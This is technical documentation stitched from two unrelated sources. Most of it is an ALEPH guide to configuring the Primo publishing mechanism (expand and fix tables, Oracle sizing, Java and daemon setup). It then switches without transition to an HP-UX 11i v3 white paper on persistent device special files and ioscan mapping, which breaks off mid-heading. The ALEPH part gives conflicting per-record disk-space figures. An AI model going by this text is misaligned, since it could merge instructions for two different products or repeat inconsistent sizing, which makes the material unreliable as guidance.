### 2.4 expand_doc_bib_accref_1
This expand program works like expand_doc_bib_accref. The difference is that the cross reference information expanded by expand_doc_bib_accref_1 is put into lines named after the acc code of the relevant Z01 record of the bibliographic library.
If, for example, the acc code of the relevant Z01 record is AUT, then the line to which the information is expanded is called AUT.
### 3 Notes on Implementing the Publishing Mechanism for Primo
#### 3.1 General
For Primo, the publishing mechanism should be set up in the bibliographic library.
In terms of expands, you should include the new expands for availability (expand_doc_bib_avail, expand_doc_bib_avail_hol) and cross-references.
Do not use expand_doc_bib_accref because Primo needs to be able to distinguish between preferred and non-preferred terms. In addition, if you need fields from the holdings records, e.g. 856 fields, include an expand that adds the HOL record to the BIB. (However, the LDR and 008 fields of the HOL must be removed. See below for an explanation of how to do this.)
If you plan to implement both a regular pipe and an availability pipe you should use the following hardcoded sets:
- **PRIMO-FULL** – Should include the bibliographic record and all related expanded data (authority, holdings and availability)
- **PRIMO-AVAIL** – Should include only availability information
Note that the disk space you require is 12KB per record for the PRIMO-FULL set and 9KB per record for the PRIMO-AVAIL set.
**Tab_publish**
Here is an example for the tab_publish setup:
```
! 1                           2                            3 4     5
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-!!!!!!!!!!!!!!!!!!!!!!!!!!!!-!-!!!!!-!!!!!!!!!!!!!!
PRIMO-FULL                    PRM01_PAC                    N PRM1  MARC_XML
PRIMO-AVAIL                   PRM01_PAC                    N PRM2  MARC_XML
```
**Expands**
The following expands should be added to tab_expand for PRIMO-FULL:
- expand_doc_bib_avail
- expand_doc_bib_accref_1
- expand_doc_bib_hol (if you need fields from the HOL record)
The complete HOL is added, but the control fields should be removed (007 is retained, as it can contain useful information and has the same format as that of the BIB). This can be done by using column 3 in the tab_expand table, as shown in the example below.
The following expands should be added for PRIMO-AVAIL
- expand_doc_bib_avail
- expand_doc_del_fields – To delete all fields except for the availability field.
Example (tab_expand):
```
PRM1  expand_doc_bib_avail
PRM1  expand_doc_bib_accref_1
PRM1  expand_doc_bib_hol
```
**Tab_fix**
The following setup is recommended to prevent the updating of Z00P due to a change in the 005 field (which is updated whenever the BIB record is saved in the cataloging client):
```
! 1 2 3
!!!!!!-!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!>
PRM1 fix_doc_do_file_08 del_005
```
The parameter file (del_005) should be located in the library’s import directory under the tab directory.
```
! 1   2     3
!!-!!!!!-!!!!!!!!!!!!!!!!!!!!>
1  005  DELETE-FIELD
```
3.2 Setup for MAB Records Extract
The following is a setup example for publishing a MAB library.
3.2.1 $data_tab/tab_publish
```
! 1 2 3 4 5
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-
PRIMO-FULL    PRIMO                                    MAB_XML
PRIMO-ONGOING PRIMO                                    MAB_XML
```
3.2.2 $data_tab/tab_expand
```
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!>
PRIMO expand_doc_sysno
PRIMO expand_doc_mab_recursive EXPAND-SON=PM-FAMILY,EXPAND-FATHER=PM-FAMILY,FIXDOC-SON=,FIXDOC-FATHER=
PRIMO expand_doc_bib_avail
PM-FAMILY expand_doc_mab_aut_ref 100##,4,196##,I-SF=9a,I-CODE=IDN,FIX-AUT=PMREF,PREF=100##,CROSS=101##,CROSS-DOC=101,TAG-MAX=99999
PM-FAMILY expand_doc_mab_aut_ref 800##,6,824##,I-SF=9a,I-CODE=IDN,FIX-AUT=PMREF,PREF=800##,CROSS=801##,CROSS-DOC=801,TAG-MAX=99999
PM-FAMILY expand_doc_mab_aut_ref 200##,4,296##,I-SF=9a,I-CODE=IDN,FIX-AUT=PMREF,PREF=200##,CROSS=201##,CROSS-DOC=201,TAG-MAX=99999
PM-FAMILY expand_doc_mab_aut_ref 802##,6,826##,I-SF=9a,I-CODE=IDN,FIX-AUT=PMREF,PREF=802##,CROSS=803##,CROSS-DOC=803,TAG-MAX=99999
PM-FAMILY expand_doc_mab_aut_ref 700##, , ,I-SF=aa,I-CODE=NNS,FIX-AUT=PMREF,PREF=700##,CROSS=701##,CROSS-DOC=701,TAG-MAX=99999
PM-FAMILY expand_doc_mab_aut_ref 902##,5,947##,I-SF=9a,I-CODE=IDN,FIX-AUT=PMREF,PREF=902##,CROSS=952##,CROSS-DOC=952,TAG-MAX=99999
```
Expand_doc_mab_recursive is called from $data_tab/tab_expand (BIB library) by using the expand menu “PRIMO”. The new expand can be configured in the following way (tab_expand, col. 3); each entry has to be separated by a comma:
- EXPAND-SON= Expand menu which should be used for expanding information from the current record (=son)
- EXPAND-FATHER= Expand menu which should be used for expanding information from the father record into the son
- FIXDOC-SON= Fix routine which should be used for the current record (=son)
- FIXDOC-FATHER= Fix routine which should be used for the father record
Expand_doc_mab_aut_ref takes the preferred term and cross-references for authorities from the authority record into the BIB record. This includes classifications (700) and subjects (9xx). Expand_doc_mab_aut_ref can be configured in the following way (tab_expand, col. 3); each entry is separated by a comma:
- First source field of the BIB record which contains the preferred term,
- Increment value (optional),
- Last source field of the BIB record which contains the preferred term (optional),
- I-SF=<Subfield of the BIB record which should be used to identify the corresponding AUT record><Subfield of the AUT record which contains the preferred term>,
- I-CODE= Direct index which should be used to identify the AUT record,
- FIX-AUT= Name of the fix routine which is used to transform the relevant fields within the AUT records into a format that is similar to the BIB fields (tab_fix, col. 1; see the description below),
- PREF= Field in the AUT record which contains the preferred term after the fix procedure called by FIX-AUT,
- CROSS= Field in the AUT record which contains the cross references after the fix procedure called by FIX-AUT,
- CROSS-DOC= Destination field in the BIB record for cross references,
- TAG-MAX= Maximum number of preferred terms and cross references per authority record to take over into the BIB record.
The fix routines that are called from “expand_doc_mab_aut_ref” (FIX-AUT=) have to be defined in ALEPH table $data_tab/tab_fix (AUT library). The fix routine is needed to transform the relevant fields (preferred term and cross references) within the AUT record into a format that is similar to the BIB fields. This is described below.
Col. 3 contains program arguments; in this case “tab_fix_convit_ref_pm” is a configuration file which contains the definitions about the source fields and destination fields (see below).
3.2.3 $data_tab/tab_fix and corresponding tab_fix_convit_ref_pm
```
PMREF fix_doc_convit FILE=tab_fix_convit_ref_pm
```
The table tab_fix_convit_ref_pm must exist in the tab directory of each authority library. The following entries should be used by default:
//lib10/tab/tab_fix_convit_ref_pm
<table>
<thead>
<tr>
<th>!</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>800</td>
<td>a</td>
<td>100</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>800a</td>
<td>a</td>
<td>100</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>800b</td>
<td>a</td>
<td>101</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>800c</td>
<td>a</td>
<td>101</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>820#</td>
<td>a</td>
<td>101</td>
<td>a</td>
<td>edit_field</td>
</tr>
<tr>
<td></td>
<td>830_</td>
<td>a</td>
<td>101</td>
<td>a</td>
<td></td>
</tr>
</tbody>
</table>
//lib11/tab/tab_fix_convit_ref_pm
<table>
<thead>
<tr>
<th>!</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>800_</td>
<td>a</td>
<td>200</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>801b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>803_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>810_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td>edit_field</td>
</tr>
<tr>
<td></td>
<td>811b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>812_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>813b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>814_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>815b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>816_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>817b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>818_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>819b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>820_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>821b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>822_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>823b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>824_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>825b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>826_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>827b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>828_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>829b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>830_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>831b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>832_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>833b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>834_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>835b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>836_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>837b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>838_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>839b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>840_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>841b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>842_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>843b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>844_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>845b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>846_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>847b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>848_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>849b</td>
<td>s</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
</tbody>
</table>
4 Technical Information for the ALEPH Publishing Mechanism
4.1 Information Required for the Maintenance of the Z00P Oracle Table
4.1.1 Disk Space, Definitions, and Basic Concepts
Entity – A representation of an ALEPH record in the Publishing platform in a certain format and in a certain type of content. Entities are stored in Oracle as a part of the ALEPH database.
Basic Entity – An entity that is in XML format containing data from the basic bibliographic record (with no expands).
Disk Space required:
<table>
<thead>
<tr>
<th></th>
<th>Basic Entity</th>
<th>Primo Entity - Full</th>
<th>Primo Entity - Avail</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Oracle Repository</strong></td>
<td>12K per entity</td>
<td>16K per entity</td>
<td>2K per entity</td>
</tr>
<tr>
<td><strong>Oracle Repository + Tar</strong></td>
<td>13K per entity</td>
<td>17K per entity</td>
<td>3K per entity</td>
</tr>
</tbody>
</table>
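The per-entity sizes above translate directly into tablespace estimates. The following back-of-envelope sketch uses the “Oracle Repository + Tar” row; the record count is an example value of ours, not a recommendation.

```python
# KB per entity from the "Oracle Repository + Tar" row of the table above.
KB_PER_ENTITY = {"BASIC": 13, "PRIMO-FULL": 17, "PRIMO-AVAIL": 3}

def estimate_gb(num_records, entity):
    # KB -> GB: divide by 1024 * 1024
    return num_records * KB_PER_ENTITY[entity] / (1024 * 1024)

# Example: one million PRIMO-FULL entities need roughly 16.21 GB.
print(round(estimate_gb(1_000_000, "PRIMO-FULL"), 2))   # 16.21
```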
4.1.2 Oracle Recommendations
- When running Initial Publishing Process (publish-04), there are two possibilities:
  - Turn off Oracle Archiving before starting to run the job. After the job is finished, Oracle Archiving should be turned on and the database should be fully backed up (hot or cold backup). The implication of choosing this possibility is that data integrity is not kept during the time Oracle Archiving is off: if the data needs to be recovered, it can only be brought back to the point in time before the job started. The benefits of this mode are better performance and less disk space.
  - Keep Oracle Archiving on. The disk space allocated for Z00P should be doubled from the sizes given above. This means the space available for the archive files should be doubled, not the Oracle tablespace. The implication of choosing this possibility is slower throughput in the process (fewer entities/sec). The benefit is keeping data integrity at all times.
- It is recommended that the publishing entity (Z00P) Oracle table have a separate tablespace to help with maintenance.
- To increase the throughput, the following setup should be applied:
- Enlarge the redo file from 50MB to 500MB. This should be done by an Oracle DBA.
- It is recommended that the redo files be on a different physical disk than the tablespace.
- If possible, the new tablespace should be on a different physical disk than the already existing ALEPH tablespace.
### 4.2 Initial Publishing Process (publish-04) Parallelism Recommendations
The Initial Publishing Process (publish-04) is a one-time process. Therefore, it is recommended to run it when the library's activity is minimal, such as during weekends and holidays. In order to maximize the throughput of the process and minimize the run time, it is recommended to use a large number of parallel processes. As a rule of thumb, use 70%-80% of the logical CPUs of the ALEPH server.
For setting a better fine-tuned configuration, it is recommended to monitor the utilization of the server and decide accordingly.
### 4.3 Implementation Notes
#### 4.3.1 Z00P/Z07P Creation
- If the `file_list` templates under `./aleph/tab/` are not being used, add the following lines to the `file_list` under the BIB/AUT libraries as in the following sample from the demo libraries.
Note that the Z07P table should be created in the same tablespace as existing ALEPH tables, and the Z07P indexes should be created in the same tablespace as existing ALEPH indexes.
In the BIB/AUT libraries, create the Z07P table using `Util / A / 17 / 1`
The publishing library is by default the `usr_library`. However, it is possible to use a different publishing library by setting the `publishing_library` environment variable in the `aleph_start` file.
If the `file_list` templates under `./aleph/tab/` are not being used, or if using a library other than the `usr_library` is required for storing the published documents, add the following lines to the `file_list` under the `usr_library` (or the library that has been set as the `publishing_library`), as in the following sample from the demo libraries.
Note that the sizes given are for demonstration purposes only. For actual sizes, see Section 4.1.1 Disk Space, Definitions, and Basic Concepts.
In the `usr_library` (or the library that has been set as the `publishing_library`), create the Z00P table using `Util / A / 17 / 1`
4.3.2 Configuration Table
- Create the table `tab_publish` under `$data_tab` of the BIB/AUT library
- Use `Util / H / 2` (under the relevant BIB/AUT library) to synchronize the header of `./aleph/headers/libnn/tab/tab_publish`
4.3.3 JAVA Environment Configuration
- Add the following lines to `./alephe/aleph_start`
- Before the line:
```
switch ($platform_type)
```
add line:
```bash
setenv JAVA_MACHINE `uname -p`
```
- For Linux machines – in $platform_type switch, at the end of case 5, after the line:
```bash
setenv JAVA_HOME
```
add line:
```bash
setenv JAVA_MACHINE i386
```
- Add the lines:
```bash
setenv JAVA_ENABLED TRUE
setenv LD_LIBRARY_PATH
"${LD_LIBRARY_PATH}:${JAVA_HOME}/jre/lib/$JAVA_MACHINE"
setenv LD_LIBRARY_PATH
"${LD_LIBRARY_PATH}:${JAVA_HOME}/jre/lib/$JAVA_MACHINE/server"
```
- AIX users -
- Make sure that Java 1.4.2 or higher is installed. On AIX machines, Java is under $ORACLE_HOME/jdk. To install the required Java version, refer to the Aleph Installation Guide.
- In your $alephe_root/aleph_start file:
1. In the definition of the environment variable LIBPATH (under the "case AIX:" section), make sure that "$JAVA_HOME/jre/bin/classic" and "$JAVA_HOME/jre/bin" are BEFORE the system library "/usr/lib". For example:
```bash
setenv LIBPATH
"${aleph_product}/lib:${aleph_product}/local/libxml/lib:${JAVA_HOME}/jre/bin/classic:${JAVA_HOME}/jre/bin:/usr/lib:${LD_LIBRARY_PATH}"
```
2. Add the following line immediately after the definition of LIBPATH (under the "case AIX:" section), and before the "breaksw" statement:
```bash
setenv LDR_CNTRL USERREGS
```
- Shutdown Aleph and restart it using:
```bash
aleph_shutdown
aleph_startup
```
4.3.4 Daemon Handling
- Restart ue_01 daemon under relevant BIB/AUT libraries.
- In order to activate the new daemon for the ongoing update of the publishing platform, under relevant BIB/AUT libraries, use:
In order to stop the new daemon use:
4.3.5 Availability Updates
In order to publish records linked through an ITM link when item availability is changed (loan, return, etc.) in adm_library (for example, USM50), add to [adm_library]/tab/tab_z105 the following line:
```
UPDATE-ITM m USM50
```
Restart ue_11 in $z105_library
4.3.6 Additional Notes
- For ALEPH v. 21.1.3 and later:
It is possible to split the tar file created by the Create Tar File for ALEPH Published Records (publish-06) batch service into several files. This can be done by setting a "block size" in the $data_root/prof_library of the BIB library as follows:
```
setenv p_publish_06_block 5000
```
This definition sets a limit on the number of records in each output file. The default is 50000.
- For ALEPH v. 21.1.4 and later:
It is possible to keep the old log files created by the Create Tar File for Aleph Published Records (publish-06) batch service. This can be done by setting the "keep_log_files" parameter to Y in the $data_root/prof_library of the BIB library as follows:
```
setenv keep_log_files Y
```
- For ALEPH v. 22.1.0 and later:
It is possible to keep the empty directories created by the Create Tar File for Aleph Published Records (publish-06) batch service. This can be done by setting the "keep_publish_dir" parameter to Y in the $data_root/prof_library of the BIB library as follows:
```
setenv keep_publish_dir Y
```
- For ALEPH v. 16.02 on a Solaris machine, GNU tar should be used. The following commands should be used:
```
cp $alephm_proc/gnu_tar $aleph_product/bin/tar
source $alephe_root/aleph_start
```
- For v. 16.02 only:
1. Replace the old version of ./alephe/error_eng/p_publish_04 with the new one.
2. Add the files:
./alephe/error_eng/ue_21
./alephe/error_eng/p_publish_05
./alephe/error_eng/p_publish_06
./alephe/pc_b_eng/p-publish-04.xml
./alephe/pc_b_eng/p-publish-05.xml
./alephe/pc_b_eng/p-publish-06.xml
3. In the file ./alephe/pc_b_eng/menu-catalog.xml
• Remove the lines:
<item>
<display>Ongoing Publishing Process (publish-03)</display>
<file>p-publish-03</file>
</item>
• Add the lines:
<item>
<display>Delete ALEPH Published Records (publish-05)</display>
<file>p-publish-05</file>
</item>
<item>
<display>Create Tar File for ALEPH Published Records (publish-06)</display>
<file>p-publish-06</file>
</item>
• Add the files:
./alephe/error_eng/ue_21
./alephe/error_eng/p_publish_06
./alephe/pc_b_eng/p-publish-05.xml
./alephe/pc_b_eng/p-publish-06.xml
**Introduction**
In HP-UX 11i v3, HP has architected a new mass storage stack and subsystems to significantly enhance scalability, performance, availability, manageability, and serviceability. Maximum configuration limits have been increased to address very large SAN configurations while delivering performance with automatic load balancing, parallel I/O scan, optimized I/O forwarding, and CPU locality.
To enhance availability, the mass storage stack monitors paths to devices, reroutes traffic and recovers from path failures when they occur. The stack has a built-in intelligent retry algorithm on path failures and also implements path authentication to avoid data corruption. The introduction of native multi-pathing and path-independent persistent Device Special Files (DSFs) and the auto discovery of devices greatly enhance the overall manageability. New commands and libraries further enhance the manageability and serviceability of mass storage devices.
This re-architecture introduces a new representation of mass storage hardware and subsystems called the agile view. The central idea of the agile view is that disk and tape devices are identified via their World Wide Identifier (WWID) and not by a path to the device. Therefore in the agile representation, multiple paths to a single device can be transparently treated as a single virtualized path, with I/O distributed across many paths. A persistent DSF is not affected by changes in the paths to the device. To take full advantage of this agile view, HP recommends the migration to persistent DSFs.
This white paper provides a step by step guide to ease the process of migrating applications from using legacy DSFs to persistent DSFs. The key areas addressed in this white paper are:
- Comprehensive set of links in *Read before Migrating to HP-UX 11i v3* documents
- New commands and command line options to operate in the agile view
- Step by Step guide on what needs to be done prior to migration
- Detailed instructions on how to migrate
- Possible recovery actions in case backing out is needed
For a complete overview of the mass storage changes in HP-UX 11i v3, see *The Next Generation Mass Storage Stack* white paper at [http://www.hp.com/go/hpux-core-docs](http://www.hp.com/go/hpux-core-docs). Click on HP-UX 11i v3 and scroll down to the White papers section.
**Formats of DSFs and Hardware Paths for Mass Storage Devices**
**Legacy View**
The legacy DSF format for disks is:
```
/dev/[r]dsk/cxtydz[sn]
```
Where
- x is the HBA instance
- y is the SCSI-2 target number
- z is the SCSI-2 LUN number
- n is the partition number
**Example:** /dev/dsk/c5t0d1 or /dev/rdsk/c6t0d1s2
Note that the legacy DSF contains path related information. Associated with each legacy DSF is a specific legacy hardware path, and a multi-pathed device will have multiple legacy DSFs.
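Because the legacy name encodes the path, its fields can be picked apart mechanically. As a rough illustration (the DSF name below is made up), a sed one-liner can decode the controller, target, and LUN fields:

```shell
# Decode the c/t/d fields of a legacy DSF name (illustrative name).
dsf=/dev/rdsk/c6t0d1s2
echo "$dsf" | sed -n 's|.*/c\([0-9]*\)t\([0-9]*\)d\([0-9]*\).*|HBA=\1 target=\2 lun=\3|p'
# prints: HBA=6 target=0 lun=1
```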
**Agile View**
The persistent DSF format for disks introduced with the agile view in HP-UX 11i v3 is:
```
/dev/[r]disk/diskx[_py]
```
Where
- x is the device instance
- y is the partition number

**Example:** /dev/disk/disk2, /dev/rdisk/disk5_p2
The persistent DSF is associated with a LUN, not with a path to a LUN. A LUN has a virtualized hardware path known as the LUN hardware path. Each physical path to the LUN is a lunpath hardware path, which is the agile equivalent of the legacy hardware path. It is important to understand that there is no path related information encoded within a persistent DSF.
For more information on the agile naming model, see the HP-UX 11i v3 Mass Storage Device Naming white paper available at http://www.hp.com/go/hpux-core-docs. Click on HP-UX 11i v3 and scroll down to the White papers section.
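Conversely, a persistent name carries only the device instance and optional partition, which can be split out the same way (again with a made-up DSF name):

```shell
# Split a persistent DSF name into instance and partition (illustrative).
dsf=/dev/rdisk/disk5_p2
echo "$dsf" | sed -n 's|.*/disk\([0-9]*\)_p\([0-9]*\)$|instance=\1 partition=\2|p'
# prints: instance=5 partition=2
```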
Agile and Legacy Views in ioscan
By default in HP-UX 11i v3, ioscan shows the legacy view. This view is compatible with previous releases of HP-UX. To enable the agile view in the output of the ioscan command, you must use the new `-N` option.
Mapping Commands
In HP-UX 11i v3, the ioscan command offers two new options to map configuration information from the legacy view to agile view:
- `-m dsf [dsf_name]`
  - To map legacy DSFs to persistent DSFs
- `-m hwpath [-H hw_path]`
  - To map legacy hardware paths to lunpath hardware paths and LUN hardware paths
Legacy DSF to Persistent DSF mapping:
The `ioscan -m dsf [dsf_name]` command shows the mapping between character legacy DSFs and character persistent DSFs if no dsf_name is specified. As a rule, the block DSFs are mapped similarly. If a dsf_name is specified, it shows the mapping for this DSF name only.
Sample `ioscan -m dsf` output:
<table>
<thead>
<tr>
<th>Persistent DSF</th>
<th>Legacy DSF(s)</th>
</tr>
</thead>
<tbody>
<tr>
<td>/dev/rdisk/disk17</td>
<td>/dev/rdsk/c9t0d0</td>
</tr>
<tr>
<td>/dev/rdisk/disk24</td>
<td>/dev/rdsk/c4t0d0</td>
</tr>
<tr>
<td>/dev/rdisk/disk37</td>
<td>/dev/rdsk/c5t0d0</td>
</tr>
<tr>
<td></td>
<td>/dev/rdsk/c8t0d0</td>
</tr>
<tr>
<td>/dev/rdisk/disk38</td>
<td>/dev/rdsk/c5t1d0</td>
</tr>
<tr>
<td></td>
<td>/dev/rdsk/c8t1d0</td>
</tr>
</tbody>
</table>
In the example above the persistent DSF /dev/rdisk/disk17 maps to the legacy DSF /dev/rdsk/c9t0d0. The persistent DSF /dev/rdisk/disk37 maps to the legacy DSFs /dev/rdsk/c5t0d0 and /dev/rdsk/c8t0d0. This also implies that block persistent DSF /dev/disk/disk17 (not shown) maps to block legacy DSF /dev/dsk/c9t0d0.
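This mapping is easy to post-process. The sketch below builds a legacy-to-persistent lookup from saved output in the shape of the table above; the sample text and the blank-first-column continuation convention are assumed for illustration, and on a live system you would pipe `ioscan -m dsf` in instead (skipping its header line):

```shell
# Build a legacy -> persistent lookup from saved `ioscan -m dsf` output.
ioscan_out='/dev/rdisk/disk17  /dev/rdsk/c9t0d0
/dev/rdisk/disk37  /dev/rdsk/c5t0d0
  /dev/rdsk/c8t0d0'
echo "$ioscan_out" | awk '
  NF == 2 { persistent = $1; print $2 " -> " persistent }
  NF == 1 { print $1 " -> " persistent }  # continuation: same LUN, extra path
'
# prints:
# /dev/rdsk/c9t0d0 -> /dev/rdisk/disk17
# /dev/rdsk/c5t0d0 -> /dev/rdisk/disk37
# /dev/rdsk/c8t0d0 -> /dev/rdisk/disk37
```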
Legacy Hardware Path to Lunpath Hardware Path mapping:
The `ioscan -m hwpath [-H hw_path]` command shows the mapping between legacy hardware paths, lunpath hardware paths, and LUN hardware paths. If a hw_path is specified with the `-H` option, it shows the mapping for that hw_path only.
Sample `ioscan -m hwpath` output:
<table>
<thead>
<tr>
<th>Lun H/W Path</th>
<th>Lunpath H/W Path</th>
<th>Legacy H/W Path</th>
</tr>
</thead>
<tbody>
<tr>
<td>64000/0xfa00/0x10</td>
<td>0/2/1/0.0x0.0x0</td>
<td>0/2/1/0.0.0</td>
</tr>
<tr>
<td>64000/0xfa00/0x8</td>
<td>0/5/1/1.0x0.0x0</td>
<td>0/5/1/1.0.0</td>
</tr>
<tr>
<td>64000/0xfa00/0x1a</td>
<td>0/2/1/1.0x0.0x0</td>
<td>0/2/1/1.0.0</td>
</tr>
<tr>
<td></td>
<td>0/5/1/0.0x0.0x0</td>
<td>0/5/1/0.0.0</td>
</tr>
<tr>
<td>64000/0xfa00/0x1b</td>
<td>0/2/1/1.0x1.0x0</td>
<td>0/2/1/1.1.0</td>
</tr>
<tr>
<td></td>
<td>0/5/1/0.0x1.0x0</td>
<td>0/5/1/0.1.0</td>
</tr>
</tbody>
</table>
The Legacy H/W path is the hardware path for the legacy DSF. The Lun H/W path is the virtualized hardware path representing the LUN. The Lunpath H/W Path is the physical hardware path to the LUN. The LUN under Lun H/W Path 64000/0xfa00/0x1a shows that it has two lunpaths leading to it. Note that the last two elements of a LUN H/W path and a Lunpath H/W path use the hexadecimal notation instead of the decimal notation.
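The hexadecimal elements can be mapped back to decimal with plain shell arithmetic. The sketch below uses one of the short sample lunpaths from the table; real Fibre Channel lunpaths often carry much longer hex target identifiers, so this is illustrative only:

```shell
# Convert the hex target/LUN elements of a lunpath hardware path back to
# the decimal form used in the legacy path (path value is illustrative).
lunpath=0/2/1/1.0x1.0x0
prefix=${lunpath%%.*}        # 0/2/1/1
rest=${lunpath#*.}           # 0x1.0x0
tgt=$(( ${rest%%.*} ))       # 0x1 -> 1 (shell arithmetic accepts 0x)
lun=$(( ${rest#*.} ))        # 0x0 -> 0
echo "$prefix.$tgt.$lun"     # prints: 0/2/1/1.1.0
```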
**Benefits of Migrating to the Persistent DSF Naming Model**
**Enhanced Features**
The HP-UX 11i v3 mass storage stack provides major enhancements for performance, management, scalability, availability, and serviceability. A major component of the new architecture is the new persistent DSF naming model. Using persistent DSFs simplifies I/O management and diagnostics and allows users to take full advantage of the rich set of new functionality.
Unlike legacy DSFs, persistent DSFs are path independent, so a LUN can move to different paths while its persistent DSF name remains the same. For example, if a Fibre Channel connection is moved to a new HBA, the legacy DSFs change, but the mass storage stack discovers the new path and the persistent DSF stays the same. This feature eliminates the need for applications to change their configuration information.
The path-independent nature of a persistent DSF offers the benefit of simplified management. Each persistent DSF represents a LUN, unlike a legacy DSF which is really a path to a LUN. In a multi-path environment, the number of persistent DSFs is smaller than the number of legacy DSFs. Applications do not have to be aware of multi-pathing, simply using a persistent DSF provides multi-pathing support.
Persistent DSFs offer significant scalability over legacy DSFs. The architectural limit is 16 million LUNs in the persistent view, versus 32,768 in the legacy view.
- **Note:** To enable a smooth migration from legacy to persistent DSFs, HP-UX 11i v3 supports coexistence of both types of DSFs, and commands can display their output in either view or show the mapping, allowing users to learn about management in the agile view while still having access to management in the legacy view. Note also that legacy DSFs are deprecated in HP-UX 11i v3 and will be obsoleted in a future release of HP-UX.
New I/O Management Commands in HP-UX 11i v3
scsimgr
A new utility, scsimgr, is provided for management and diagnostics of SCSI objects (such as a single LUN, LUN path, target path, host bus adapter (HBA), or a group of these) and subsystems (SCSI services module, a SCSI class driver, or a SCSI interface, also known as interface driver). Most of the options to this utility are used in the agile view (requiring persistent DSFs as input).
Migration to the persistent DSFs offers an enhanced experience in I/O management and diagnosis of the mass storage stack.
For more information, see scsimgr(1M) and the scsimgr SCSI Management And Diagnostics Utility on HP-UX 11i v3 white paper at http://www.hp.com/go/hpux-core-docs. Click on HP-UX 11i v3 and scroll down to the White papers section.
io_redirect_dsf
